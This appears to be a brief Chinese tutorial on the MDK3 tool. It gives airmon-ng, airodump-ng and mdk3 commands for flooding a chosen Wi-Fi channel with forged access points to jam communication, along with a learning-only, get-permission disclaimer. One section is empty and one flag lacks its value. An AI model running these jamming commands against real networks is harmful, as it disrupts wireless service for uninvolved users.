一、用法概述
利用常见的IEEE 802.11协议弱点,对扫描到的AP进行攻击
(注:在使用MDK之前,有责任获得网络AP客户端的许可!仅供学习,勿要破坏!)
二、命令格式
三、用法示例
3.1 伪造大量AP来干扰通讯
》》网卡开启监听模式
airmon-ng start wlan0
》》扫描网卡接收范围内所有AP(为了寻找某信道,从而针对专门的信道)
airodump-ng wlan0mon
》》针对专门信道伪造大量AP进行通讯干扰
mdk3 wlan0mon b -g -c
- b :泛洪模式
- -g:伪造正常的
- -c:信道
(-n:可指定伪造AP的名称)
其它命令在没有经过AP接入者同意情况下严禁使用!